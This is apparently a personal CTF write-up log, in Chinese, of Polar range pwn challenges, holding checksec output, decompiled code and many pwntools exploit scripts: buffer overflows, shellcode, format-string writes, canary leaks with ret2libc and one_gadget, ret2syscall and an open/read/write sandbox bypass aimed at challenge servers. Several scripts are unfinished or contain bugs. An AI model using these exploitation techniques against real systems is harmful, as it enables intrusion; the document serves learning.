这个靶场挺好的,比较基础
后缀未做出的我都会标记
后续会补上
Polar overload1 2024.9.25
日常检查
就是一个常规的覆盖溢出
但是就是要记住gets函数溢出的栈的长度
ida反编译的不太对
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 from pwn import * p=remote('120.46.59.242' , 2102 ) ret_addr=0x0000000000400661 pop_rdi=0x0000000000400973 bin_sh=0x000000400A3C system_addr=0x04008FD p.sendafter('输入y/n' ,b'y' ) p.recvuntil('\n' ) payload = b'a' *0x117 p.sendline(payload) p.interactive()
Easy_ShellCode 日常检查
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_ShellCode$ checksec 1111 [*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/Easy_ShellCode/1111' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x8048000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_ShellCode$
丢进ida里面看看
1 2 3 4 5 6 7 8 9 10 ssize_t Start () { char buf[104 ]; init (); write (1 , "Please Input:\n" , 0xEu ); read (0 , &str, 256u ); puts ("What,s your name ?:" ); return read (0 , buf, 256u ); }
怎么说呢?
str在bss段上
buf在栈上
没有后门
在bss段上写shellcode?
在buf栈上执行??????
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 from pwn import *context(log_level= 'debug' , arch = 'i386' , os = 'linux' ) p=process('./1111' ) p=remote('120.46.59.242' , 2101 ) str_addr=0x804A080 p.recvuntil('Please Input:\n' ) shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.recvuntil('What,s your name ?:\n' ) payload=b'a' *(0x68 +4 )+p32(str_addr) p.sendline(payload) p.interactive()
yes,是这样的
简单题是这样的
要是所有的都这样就好了
Easy_Text+Fmt 2024.9.25
1 2 3 4 5 6 7 8 bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_Text+Fmt$ checksec 1111 [*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/Easy_Text+Fmt/1111' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/Easy_Text+Fmt$
日常检查
丢进ida里面
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 int __cdecl main (int argc, const char **argv, const char **envp) { char s[104 ]; init (); puts ("Please Input Your Lucky Number:" ); gets (s); printf (s); if ( x == 66 ) Choice1 (); if ( y == 6710886 ) Choice2 (); if ( d == 48 ) Choice3 (); else printf ("You don't know much about string formatting, so go ahead and learn!" ); return 0 ; }
简单的格式化字符串,
简单的找一下偏移
偏移为7
1 2 3 4 5 6 7 8 9 10 11 12 13 from pwn import *p=process('./1111' ) y_addr=0x804A038 payload=p32(y_addr)+p32(0x666666 )+b'%$7n' p.sendline(payload) p.interactive()
操了
还有个后门啊
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 from pwn import *p= remote('120.46.59.242' , 2126 ) context(log_level='debug' ,arch='i386' ,os='linux' ) d_addr=0x804A040 backdoor=0x80486B0 payload=p32(d_addr)+b'a' *(48 -4 )+b'%7$n' p.recv() p.sendline(payload) payload1=b'a' *(0x3a +4 )+p32(backdoor) p.recv() p.sendline(payload1) p.interactive() from pwn import *p= remote('120.46.59.242' , 2126 ) context(log_level='debug' ,arch='i386' ,os='linux' ) d_addr=0x804A040 backdoor=0x80486B0 payload=p32(d_addr)+b'a' *(48 -4 )+b'%7$n' p.recvuntil("Please Input Your Lucky Number:\n" ) p.sendline(payload) payload1=b'a' *(0x3a +4 )+p32(backdoor) p.recvuntil('Please Input:' ) p.sendline(payload1) p.interactive()
好题啊好题
小狗汪汪汪 2024.9.25
日常检查
1 2 3 4 5 6 7 8 9 bbq@ubuntu:~/桌面/pwn/小狗汪汪汪$ checksec 1111 [*] '/home/bbq/pwn/小狗汪汪汪/1111' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) bbq@ubuntu:~/桌面/啊布拉布拉/御宛杯(社会赛道)/pwn/小狗汪汪汪$
看着还行
ida里面看看
后门
1 2 3 4 5 6 7 from pwn import * p=remote('120.46.59.242' ,2073 ) payload = b'a' *(0x9 +4 )+p32(0x804859B ) p.sendline(payload) p.interactive()
小猫喵喵喵 2024.8.25
日常检查
1 2 3 4 5 6 7 8 bbq@ubuntu:~小猫喵喵喵$ checksec 1111 [*] '/home/bbq//1111' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) bbq@ubuntu:~/桌面/啊布拉布拉/御宛杯(社会赛道)/pwn/小猫喵喵喵$
看着不难应该
自己写个shell吗?
套公式吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 from pwn import *p = remote('120.46.59.242' , 2142 ) offset = (0x6c +4 ) system_addr = 0x8048480 buf2_addr = 0x804A080 gets_addr = 0x8048450 payload = b'a' *offset + p32(gets_addr) + p32(system_addr) + p32(buf2_addr) + p32(buf2_addr) p.sendline(payload) p.sendline("/bin/sh" ) p.interactive()
歪日
这个get是用不了
我嘞个豆
看一眼wp,这个scanf是直接当gets用的
2024.9.25
1 2 3 4 5 6 7 8 bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/format_ret2libc$ checksec 1111 [*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/format_ret2libc/1111' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/format_ret2libc$
日常检查
盲猜一手
格式化字符串泄露canary地址
然后找libc基址
canary有一个,基址有一个
先找一手偏移
1 2 3 4 5 6 bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/format_ret2libc$ ./1111 Nice to meet you! Say some words: aaaaaaaa_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p aaaaaaaa_0x7ffd68abfb20_0x80_0x7f40387d11f2_0x12_0x7f40388d9d60_0x6161616161616161_0x255f70255f70255f_0x5f70255f70255f70_0x70255f70255f7025_0x255f70255f70255f_0x5f70255f70255f70_0x70255f70255f7025_0x255f70255f70255f_0x5f70255f70255f70_0x980000a7025_0x98000000980_0x7f4038751e8d_(nil)_0x7f40388b06a0_0x1_0x7f40388b0723_0xd68 What's your name?
偏移为6
然后就是看一下canary的位置
1 2 3 4 5 6 7 8 .text:0000000000400888 mov rax, [rbp+var_8] .text:000000000040088C xor rax, fs:28h ;-0000000000000070 ;-0000000000000070 buf db 104 dup(?) ;-0000000000000008 var_8 dq ? ;+0000000000000000 s db 8 dup(?) ;+0000000000000008 r
在rbp上面8位
1 2 3 4 5 +-----------------+ | canary | +-----------------+ | rbp | +-----------------+
看一下主函数
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 int __fastcall main (int argc, const char **argv, const char **envp) { init (argc, argv, envp); puts ("Nice to meet you!" ); secret (); SetString (); return 0 ; } __int64 secret () { char buf[264 ]; unsigned __int64 v2; v2 = __readfsqword(0x28u ); puts ("Say some words:" ); read (0 , buf, 0x80uLL ); printf (buf); return 0LL ; } unsigned __int64 SetString () { char buf[104 ]; unsigned __int64 v2; v2 = __readfsqword(0x28u ); puts ("What's your name?" ); read (0 , buf, 0x100uLL ); return __readfsqword(0x28u ) ^ v2; }
大概也知道了
第一次read函数进行泄露canary地址
第二次泄露进行泄露puts函数的基址
首先泄露canary地址吧
接收一下
1 2 3 4 5 gdb 111 b *printf c aaaa_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p stack 50
可以看见
1 2 0xddc8 -0xdcc0 =0x108 0x108 /4 =33
可以看见偏移为33
33加上6总共为39
1 2 3 4 5 6 7 8 9 10 11 12 13 from pwn import *p=process('./1111' ) elf=ELF('./1111' ) payload='%39$p' p.sendline(payload) r.recvuntil('0x' ) canary = int (r.recv(16 ),16 ) p.interactive()
后面接着puts函数进行泄露libc版本就行了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 from pwn import *p=remote('120.46.59.242' ,2140 ) elf=ELF('./1111' ) libc=ELF('./' ) payload='%39$p' p.sendline(payload) p.recvuntil('0x' ) canary = int (p.recv(16 ),16 ) puts_plt = elf.plt['puts' ] puts_got = elf.got['puts' ] main = 0x00000000040084B pop_rdi =0x0000000000400943 ret_addr=0x00000000004005d9 p.recvuntil('name?\n' ) payload = b'a' *(0x70 -8 )+p64(canary)+p64(0xdeadbeef )+p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main) p.sendline(payload) puts_addr = u64(p.recv(6 ).ljust(8 ,b'\x00' )) print (hex (puts_addr))libc_base = puts_addr - libc.sym["puts" ] print (hex (libc_base))system_addr = libc_base+libc.sym["system" ] bin_sh = libc_base+libc.search(b"/bin/sh\x00" ).__next__() p.recvuntil('name?\n' ) payload = b'a' *(0x70 -8 )+p64(canary)+b'a' *8 +p64(0xdeadbeef )+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) p.sendline(payload) p.interactive()
libc版本一直试不对
so,本来都想放弃了
但是想起来有个onegadget来着
就试了试成了
脚本试AI改的
1 one_gadget ./libc6_2.23-0ubuntu11.2_amd64.so
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 from pwn import *p = remote('120.46.59.242' , 2140 ) elf = ELF('./1111' ) libc = ELF('./libc6_2.23-0ubuntu11.2_amd64.so' ) payload = '%39$p' p.sendline(payload) p.recvuntil('0x' ) canary = int (p.recv(16 ), 16 ) puts_plt = elf.plt['puts' ] puts_got = elf.got['puts' ] main = 0x00000000040084B pop_rdi = 0x0000000000400943 ret_addr = 0x00000000004005d9 p.recvuntil('name?\n' ) payload = b'a' *(0x70 -8 ) + p64(canary) + p64(0xdeadbeef ) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main) p.sendline(payload) puts_addr = u64(p.recv(6 ).ljust(8 , b'\x00' )) print (f"[+] puts address: {hex (puts_addr)} " )libc_base = puts_addr - libc.sym["puts" ] onegadget_addr = libc_base + 0x4527a p.recvuntil('name?\n' ) payload = b'a' *(0x70 -8 ) + p64(canary) + b'a' *8 + p64(ret_addr) + p64(onegadget_addr) p.sendline(payload) p.interactive()
最终得到flag
没人能拒绝猫猫 日常检查
1 2 3 4 5 6 7 8 bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/没人能拒绝猫猫$ checksec cat [*] '/home/bbq/桌面/啊布拉布拉/Polar/pwn/没人能拒绝猫猫/cat' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~/桌面/啊布拉布拉/Polar/pwn/没人能拒绝猫猫$
开了 个canary
丢进ida里面看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 int __fastcall main (int argc, const char **argv, const char **envp) { char buf[32 ]; __int64 s2[6 ]; s2[5 ] = __readfsqword(0x28u ); init (argc, argv, envp); puts (" __ __," ); puts (" \\,`~\"~` /" ); puts (" .-=-. / . .\\" ); puts (" / .-. \\ { = Y}=" ); puts (" (_/ \\ \\ \\ / " ); puts (" \\ \\ _/`'`'`b" ); puts (" `.__.-'` -._" ); puts (" | '.__ `'-;_" ); puts (" | _.' `'-.__)" ); puts (" \\ ;_..--'/ // " ); puts (" | / / | // | shawroot.cc" ); puts (" \\ \\ __) // /" ); puts (" \\__) '.// .'" ); puts (" `'-'`" ); s2[0 ] = 'tacetah' ; puts ("Do you love cat? (lovecat/hatecat)" ); read (0 , buf, 0x28uLL ); if ( !strcmp ("lovecat" , s2) ) { puts ("Nice choice!\n" ); system ("/bin/sh" ); } else { puts ("Everyone have their own choice.\n" ); puts ("My choice is you have no flag^^" ); } return 0 ; }
简单看一下s2也在栈上
一个简单的覆盖
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 from pwn import *p=remote('120.46.59.242' ,2051 ) elf=ELF('./1111' ) payload = b'a' *(0x20 )+b'lovecat\x00' p.sendline(payload) p.interactive() ''' from pwn import * #r = remote('120.46.59.242',2106) payload = b'a'*(0x50-0x30)+b'lovecat\x00' r.sendline(payload) r.interactive() '''
sandbox 一个简单的沙箱,
easypwn2 1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec easypwn [*] '/home/bbq/easypwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~$
ida看一眼,满足条件就行
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 int __fastcall main (int argc, const char **argv, const char **envp) { char s[24 ]; unsigned __int64 v5; v5 = __readfsqword(0x28u ); init (argc, argv, envp); puts ("**********************************" ); puts ("* Welcome to the 504sys! *" ); puts ("* And Welcome to the bin world! *" ); puts ("* Let's try to pwn the world! *" ); puts ("**********************************" ); __isoc99_scanf("%16s" , s); if ( strchr (s, 45 ) ) return 0 ; if ( atoi (s) < 0 ) vuln (); return 0 ; }
找一下atoi函数的漏洞。
what’s your name 2024.11.2
还是比较简单的
应该只是一个覆盖问题
1 2 3 4 5 6 7 8 9 10 11 12 int __cdecl main (int argc, const char **argv, const char **envp) { setvbuf (stdin, 0 , 2 , 0 ); setvbuf (stdout, 0 , 2 , 0 ); setvbuf (stderr, 0 , 2 , 0 ); puts ("Hey!What's this?!" ); read (0 , &b, 0x14u ); puts (c); if ( !strcmp (c, "tznb" ) ) system ("cat ./flag" ); return 0 ; }
1 2 3 4 5 6 llq@llq-virtual -machine:~$ ./pwn2 Hey!What's this?! aaaaabbbb abbbb llq@llq-virtual-machine:~$
应该还有个小段序的问题,这里直接搓脚本吧
1 2 3 4 5 6 7 8 9 from pwn import *p=remote("1.95.36.136" , 2118 ) paylaod=b'aaaa' +b'tznb\x00\x00\x00\x00' p.send(paylaod) p.interactive()
getshell 2024.11.2
1 2 3 4 5 6 7 8 9 10 11 llq@llq-virtual-machine:~$ checksec pwn2 [*] '/home/llq/pwn2' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments Stripped: No llq@llq-virtual-machine:~$
有后门说是
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 int __fastcall main (int argc, const char **argv, const char **envp) { __int16 v4[2 ]; int v5; _BYTE v6[88 ]; int v7; setvbuf (stdin, 0LL , 2 , 0LL ); setvbuf (stdout, 0LL , 2 , 0LL ); setvbuf (stderr, 0LL , 2 , 0LL ); v4[0 ] = 0 ; v4[1 ] = 0 ; v5 = 0 ; memset (v6, 0 , sizeof (v6)); v7 = 0 ; printf ("%p\n" , v4); gets (v4); return 0 ; }
啥意思呢?
直接打了栈的地址?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from pwn import *p=process('./pwn2' ) offset = (0x70 +8 ) system_addr = 0x000000000400560 gets_addr = 0x000000000400590 rdi_addr = 0x0000000000400803 ret_addr = 0x0000000000400549 buf2_addr = 0x000000000601060 payload = b'a' *offset + p64(rdi_addr) + p64(buf2_addr) + p64(gets_addr) + p64(rdi_addr) + p64(buf2_addr) + p64(system_addr) p.recv() p.sendline(payload) p.sendline("/bin/sh" ) p.interactive()
应该不是这样做的吧
谁道呢?
Game-找不到libc版本 2024.11.2
嘶!
1 2 3 4 5 6 7 8 9 llq@llq-virtual-machine:~$ checksec 1111 [*] '/home/llq/1111' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No llq@llq-virtual-machine:~$
看着还是挺正常的
漏洞gets函数
前面有几个绕过
但是没有后门??
傻逼了,泄露libc基址
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2053 ) sla('game?' ,b'yes' ) sla('learning?\n' ,b'yes' ) rl('as you!\n' ) payload=b'a' *(0x6c +4 )+p32(elf.plt['puts' ]) + p32(0x80485F4 ) + p32(elf.got['puts' ]) sl(payload) puts_addr=get_addr32() pr(hex (puts_addr)) ''' libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") pr(hex(libc_base)) ''' libc_base=get_addr32()-libc.sym['puts' ] pr(hex (libc_base)) ''' system_addr = libc_base+libc.sym["system"] bin_sh = libc_base+libc.search(b"/bin/sh\x00").__next__() #attack2 #sla('game?',b'yes') #sla('learning?\n',b'yes') #rl('as you!\n') payload = flat([b'A'*(0x6c+4),system_addr,b'AAAA',bin_sh]) sl(payload) ''' inter()
找不到libc版本,就这样吧
ida打开
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 unsigned int Input () { char buf[100 ]; unsigned int v2; v2 = __readgsdword(0x14u ); memset (buf, 0 , sizeof (buf)); puts ("What's your name?" ); read (0 , buf, 0x50u ); printf (buf); if ( n == 4 ) Shell (); else puts ("Bye~" ); return __readgsdword(0x14u ) ^ v2; }
格式化字符串,确定一下偏移就行
1 2 3 4 5 llq@llq-virtual-machine:~$ ./test_format What's your name? aaaa_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p_%p aaaa_0xff934698_0x50_0xea47c576_0xea62ada0_(nil)_0x61616161_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_0x255f7025_0x70255f70_0x5f70255f_Bye~ llq@llq-virtual-machine:~$
看见偏移为6也是拿下了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) elf=ELF('./test_format' ) p = process('./test_format' ) n=0x804A030 payload=p32(n)+"%6$n" s(payload) inter()
wsfw
03ret2syscall_32 1 2 3 4 5 6 7 8 9 10 11 12 llq@llq-virtual-machine:~$ checksec 1111 [*] '/home/llq/1111' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x8048000) Stack: Executable RWX: Has RWX segments Stripped: No llq@llq-virtual-machine:~$
这会包是ret2syscall了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so' ) elf=ELF('./' ) p = process('./' ) pop_eax = 0x080b8576 pop_edx_ecx_ebx = 0x0806f250 bss = 0x80EBB80 int_0x80 = 0x0806cea3 edx_ecx_ebx_pop = 0x0806f250 sh_pop = 0x80EA068 Ret_syscall = 0x08062d2d payload = b"a" *(0x208 +4 ) payload += p32(pop_eax)+p32(0x0b ) payload += p32(edx_ecx_ebx_pop)+p32(0x0 )+p32(0x0 )+p32(sh_pop) payload += p32(ret_syscall) sl(payload) inter()
有bin/sh哇
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2104 ) pop_eax = 0x080b8576 pop_edx_ecx_ebx = 0x0806f250 int_0x80 = 0x0806cea3 edx_ecx_ebx_pop = 0x0806f250 sh_pop = 0x80EA068 payload = b"a" *(0x208 +4 ) payload += p32(pop_eax)+p32(0x0b ) payload += p32(edx_ecx_ebx_pop)+p32(0x0 )+p32(0x0 )+p32(sh_pop) payload += p32(int_0x80) sl(payload) inter()
easyrop ida看一眼
有system函数和sh
大概是64位ROP
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) elf=ELF('./easyrop1' ) p=remote('1.95.36.136' , 2148 ) pop_rdi=0x0000000000400813 ret_addr=0x0000000000400569 bin_sh=0x000000000601050 system_addr=0x00000000400590 payload= b'a' *(0x70 +8 )+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) sl(payload) inter()
try_sandbox 2024.11.2
日常检查一下
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~$ checksec pwn1 [*] '/home/bbq/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~$
ida里面看看
1 2 3 4 5 6 7 8 9 __int64 __fastcall main (__int64 a1, char **a2, char **a3) { sub_4012E5 (a1, a2, a3); mmap (0x166000 , 0x1000uLL , 7 , 34 , -1 , 0LL ); sandox (); stack (); return 0LL ; }
有沙箱,看一下过滤
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 seccomp-tools dump ./pwn bbq@ubuntu:~$ seccomp-tools dump ./pwn1 line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007 0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007 0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0007: 0x06 0x00 0x00 0x00000000 return KILL bbq@ubuntu:~$
没啥用感觉
就像是ret2libc
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./pwn1' ) p = process('./pwn1' ) pop_rdi=0x00000000004013f3 pop_rsi_r15=0x00000000004013f1 payload= (0x40 +8 )+p64(pop_rdi)+p64(1 )+p64(pop_rsi_r15)+p64(write_got)+p64(8 )+p64(write_plt)+p64(main_addr) s(payload) write_addr=get_addr64() pr(hex (write_addr)) inter()
我说他开头说啥呢?
原来是
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 from pwn import *io = remote("1.95.36.136" , 2074 ) elf = ELF("./pwn1" ) context(os='linux' ,arch='amd64' ,log_level='debug' ) def dbg (): gdb.attach(io) pause() jmp_rsp = 0x0000000000401334 mmap = 0x166000 def Orw (): orw = shellcraft.open ("./flag" ) orw += shellcraft.read(3 , mmap, 0x50 ) orw += shellcraft.write(1 ,mmap, 0x50 ) return orw def Pay (): payload = asm(shellcraft.read(0 , mmap, 0x100 )) + asm('mov rax,0x166000\ncall rax\n' ) payload = payload.ljust(0x48 , b'\x00' ) payload += p64(jmp_rsp) + asm('sub rsp,0x50;jmp rsp' ) return payload orw = asm(Orw()) payload = Pay() io.sendline(payload) io.sendline(orw) io.interactive()
8字节能干什么 2024.11.3
看名字就知道是栈迁移了
